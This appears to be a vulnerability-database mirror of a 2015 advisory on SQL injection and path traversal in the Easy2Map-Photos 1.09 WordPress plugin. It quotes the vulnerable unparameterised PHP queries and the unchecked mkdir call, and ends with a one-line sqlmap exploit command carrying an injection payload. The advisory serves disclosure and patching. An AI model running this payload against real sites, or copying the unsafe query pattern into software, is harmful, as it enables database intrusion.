Vulners
Lucene search
WordPress Easy2Map-Photos 1.09 SQL Injection
🗓️ 08 Jul 2015 00:00:00Reported by Larry W. CashdollarType 
packetstorm🔗 packetstormsecurity.com👁 38 Views
| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
 | CVE-2015-4615 | 16 Feb 201900:24 | – | circl |
| CVE-2015-4617 | 16 Feb 201900:24 | – | circl |
 | WordPress Easy2Map Photos Plugin Directory Traversal Vulnerability | 20 Jul 201500:00 | – | cnvd |
| WordPress Easy2Map Photos Plugin SQL Injection Vulnerability | 20 Jul 201500:00 | – | cnvd |
 | CVE-2015-4615 | 15 Feb 201921:00 | – | cve |
| CVE-2015-4617 | 15 Feb 201921:00 | – | cve |
 | CVE-2015-4615 | 15 Feb 201921:00 | – | cvelist |
| CVE-2015-4617 | 15 Feb 201921:00 | – | cvelist |
 | EUVD-2015-4635 | 7 Oct 202500:30 | – | euvd |
| EUVD-2015-4637 | 7 Oct 202500:30 | – | euvd |
10
`Title: SQL Injection in easy2map-photos wordpress plugin v1.09
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-08
Download Site: https://wordpress.org/plugins/easy2map-photos
Vendor: Steven Ellis
Vendor Notified: 2015-06-08, fixed in v1.1.0
Vendor Contact: https://profiles.wordpress.org/stevenellis/
Advisory: http://www.vapid.dhs.org/advisory.php?v=130
Description: Easy2Map Photos is a simple-yet-powerful tool for generating great-looking geo-tagged photo galleries.
Vulnerability:
The following lines in includes/Functions.php are vulnerable to SQL injection attack because they aren’t parameterized or sanitizing user input.
48 $wpdb->query(sprintf("UPDATE $mapsTable
49 SET PolyLines = '%s'
50 WHERE ID = '%s';", $PolyLines, $mapID));
218 $wpdb->query(sprintf("
219 UPDATE $mapsTable
220 SET TemplateID = '%s',
221 MapName = '%s',
222 Settings = '%s',
223 CSSValues = '%s',
224 CSSValuesPhoto = '%s',
225 CSSValuesMap = '%s',
226 MapHTML = '%s',
227 IsActive = 1
228 WHERE ID = %s;",
229 $_REQUEST['mapTemplateName'],
230 $_REQUEST['mapName'],
231 urldecode($_REQUEST['mapSettingsXML']),
232 urldecode($_REQUEST["parentCSSXML"]),
233 urldecode($_REQUEST["photoCSSXML"]),
234 urldecode($_REQUEST["mapCSSXML"]),
235 urldecode($_REQUEST["mapHTML"]), $mapID));
238 //this is a map insert
239 if (!$wpdb->query(sprintf("
240 INSERT INTO $mapsTable(
241 TemplateID,
242 MapName,
243 DefaultPinImage,
244 Settings,
245 LastInvoked,
246 PolyLines,
247 CSSValues,
248 CSSValuesPhoto,
249 CSSValuesMap,
250 MapHTML,
251 IsActive
252 ) VALUES ('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s' , 0);",
253 $_REQUEST['mapTemplateName'],
254 $_REQUEST['mapName’]
331 $wpdb->query(sprintf("
332 UPDATE $mapsTable
333 SET MapName = '%s'
334 IsActive = 1
335 WHERE ID = %s;",
336 $_REQUEST['mapName'],
337 $mapID));
Also
In MapPinImageUpload.php and MapPinIconSave.php this code would allow someone to create files outside of the intended upload directory by adding ../../../../ path traversal characters:
if (!file_exists($imagesDirectory)) {
mkdir($imagesDirectory);
}
CVEID: 2015-4615 2015-4617
OSVDB:
Exploit Code:
• $ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie=COOKIE HERE --level=5 --risk=3
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Jul 2015 00:00Current
8.1High risk
Vulners AI Score8.1
EPSS0.00758